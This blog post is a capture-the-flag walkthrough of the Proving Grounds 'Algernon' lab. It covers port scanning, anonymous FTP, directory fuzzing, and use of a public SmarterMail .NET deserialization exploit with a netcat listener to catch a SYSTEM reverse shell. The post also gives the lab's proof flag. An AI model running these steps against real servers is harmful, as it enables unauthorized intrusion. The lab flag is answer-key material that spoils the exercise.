.

/ z3k0sec's blog
Hacker | Penetration Tester | Security Researcher

Blog | About Me | Tags Archive | Feed

19 May 2023

Proving Ground Practice: Algernon

We will exploit the machine via a .NET deserialization attack found in SmarterMail Build 6985 (.NET remoting
endpoint on port 17001).

NMAP

As always, we start off with a nmap scan.

sudo nmap -sC -sV -Pn 192.168.232.65 -p-

21/tcp open ftp Microsoft ftpd

| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20 10:31PM <DIR> ImapRetrieval
| 02-17-23 12:38PM <DIR> Logs
| 04-29-20 10:31PM <DIR> PopRetrieval
|_04-29-20 10:32PM <DIR> Spool
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
9998/tcp open http Microsoft IIS httpd 10.0
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Wed, 17 May 2023 22:36:25 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
17001/tcp open remoting MS .NET Remoting services
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-05-17T22:36:25
|_ start_date: N/A

PORTS

PORT 21: FTP

Since anonymous login is allowed, let’s authenticate via:

ftp [email protected]

We have access to 4 different directories (see image below).

The Logs directory contains some logs. Download them via mget * and analyse them. We did not find anything of
use, so let’s get out of this potential rabbit hole asap.

PORT 80: DIRECTORY AND FILES ENUMERATION

ffuf -c -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u "http://192.168.232.65/FUZZ"

ffuf -c -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u "http://192.168.232.65/aspnet_client/FUZZ"

/'___\ /'___\ /'___\

/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.5.0
________________________________________________

:: Method : GET
:: URL : http://192.168.232.65/aspnet_client/FUZZ
:: Wordlist : FUZZ: /home/white/SecLists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 28ms]

system_web [Status: 301, Size: 170, Words: 9, Lines: 2, Duration: 33ms]

After some time enumerating further directories and potential .aspx files, we did not find anything. So let’s move on.

PORT 135: RPC

We tried to null authenticate via rpclient, but the server responses with an “access denied” message.

PORT 139: SMB

Same thing happens when we try to authenticate via null authentication via crackmapexec smb module:

FOOTHOLD + PRIV ESC

PORT 9998: SmarterMail

The only interesting port that stands out is on port 9998. The web application is called “SmarterMail”.

We search for a public exploit on searchsploit / exploitdb:

searchsploit smartermail

Since there are multiple hits and have to find out the version that is currently running on the server. (see below)
Inspect the web application’s source code (“View source code”) and we figure it is running on version / build 6919.
(kinda odd naming convention for versioning)

Mirror the exploit and open it:

searchsploit -m windows/remote/49216.py

Notice that it mentions a .NET remoting endpoint that is vulnerable to a .NET deserialisation attack. Remember that
port 17001 from the nmap scan we performed earlier? That seems to be such a endpoint. Sweet!

Set the variables in the exploit script as follows:

HOST = target machine IP

PORT = .NET remote endpoint (port 17001)
LHOST = attacker machine IP
LPORT = netcat listening port

Before we execute the script, set up a netcat handler on port 9001.

nc -lvnp 9001

Once we run the python script via:

python3 49216.py

We receive a connection from the target machine and gain a shell as nt_authority .

proof.txt

Grab the proof.txt flag and we have owned the machine.

PS C:\Windows\system32> cat C:\users\administrator\desktop\proof.txt

9a6c5ae155d06074a9a8ae187b5be566

Tags : [ ms09_050 smb proving_grounds algernon ]

</> with by z3k0sec